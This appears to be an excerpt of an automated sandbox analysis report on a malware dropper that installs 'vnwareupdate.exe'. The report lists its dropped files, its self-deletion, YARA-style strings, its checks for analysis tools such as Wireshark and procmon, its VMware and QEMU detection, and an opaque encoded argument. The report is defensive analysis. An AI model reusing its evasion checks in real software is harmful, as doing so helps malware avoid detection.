Source:	Binary string: $s6 = "\\obj\\Release\\ZPP.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "uac\\bin\\install_test.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\dnscat2.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "c:\\ntevt.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD5Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDaBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8@ source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\support\\Release\\ab.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\ms11080\\Debug\\ms11080.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_00401D61 push ecx; ret	3_2_00401D74
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02CFB2B1 push ecx; ret	3_2_02CFB2C4
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C39F8F pushfd ; ret	3_2_02C39F96
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02E0B2B1 push ecx; ret	5_2_02E0B2C4
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02E6B2B1 push ecx; ret	8_2_02E6B2C4
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C30678 push es; ret	9_2_02C3067A
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C6B2B1 push ecx; ret	9_2_02C6B2C4
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02C5B2B1 push ecx; ret	10_2_02C5B2C4

Source: initial sample

Static PE information: section name: .text entropy: 6.92175980221

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\winxpgui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\python27.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_cffi_backend.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.adsi.adsi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\yara.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\mfc90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\cryptography.hazmat.bindings._constant_time.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32clipboard.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32pdh.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\msvcp90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\tk85.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32pipe.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.directsound.directsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.mapi.mapi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\python27.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.authorization.authorization.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\cryptography.hazmat.bindings._openssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\msvcm90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32event.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\pywintypes27.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32wnet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.taskscheduler.taskscheduler.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\tcl85.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.mapi.exchange.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.bits.bits.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\MSVCR90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\pythoncom27.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.ifilter.ifilter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.internet.internet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\MSVCR90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.axcontrol.axcontrol.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.axscript.axscript.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32gui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.mapi.exchdapi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.propsys.propsys.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.axdebug.axdebug.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\vnwareupdate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32file.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\cryptography.hazmat.bindings._padding.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32com.shell.shell.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File created: C:\Users\user\Desktop\lib\win32process.pyd	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Users\user\Desktop\vnwareupdate.exe

File deleted: c:\users\user\desktop\gze6ecstpo.exe

Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $S5 = "WIRESHARK.EXE" FULLWORD ASCII
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $A2 = "DUMPCAP.EXE" FULLWORD ASCII
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $X12 = "ANTISNIFF -A WIRESHARK.EXE" FULLWORD ASCII
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $S3 = "WINDUMP.EXE" FULLWORD ASCII
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $S2 = "TCPDUMP.EXE" FULLWORD ASCII
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $X1 = ";PROCMON64.EXE;NETMON.EXE;TCPVIEW.EXE;MINISNIFFER.EXE;SMSNIFF.EXE" ASCII

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\winxpgui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32wnet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.taskscheduler.taskscheduler.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\tcl85.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.mapi.exchange.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.bits.bits.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.adsi.adsi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\yara.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\mfc90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.ifilter.ifilter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.internet.internet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32clipboard.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.axcontrol.axcontrol.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.axscript.axscript.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32pdh.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32gui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\msvcp90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.mapi.exchdapi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\tk85.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32pipe.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.mapi.mapi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.directsound.directsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.propsys.propsys.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32event.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\msvcm90.dll	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.axdebug.axdebug.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32com.authorization.authorization.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32process.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lib\win32ui.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405768
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_004062A3 FindFirstFileA,FindClose,	0_2_004062A3
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: C:\Users\user\Desktop\vnwareupdate.exe

Code function: 3_2_02C46250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetSystemInfo,

3_2_02C46250

Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\	Jump to behavior

Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	Binary or memory string: Check_VMWare_DeviceMap
Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	Binary or memory string: Check_VmTools
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $v1 = "vmware" fullword ascii
Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	Binary or memory string: Check_Qemu_Description
Source: GZe6EcSTpO.exe, 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp	Binary or memory string: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=C:\Users\user\Desktop\Uninstall.exesmVath_DakotaxpTheme.tclluler.taskscheduler.pyde.pydx
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	Binary or memory string: .tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=q
Source: GZe6EcSTpO.exe, 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp	Binary or memory string: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=GhT1
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp	Binary or memory string: tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=
Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	Binary or memory string: antivm_vmware
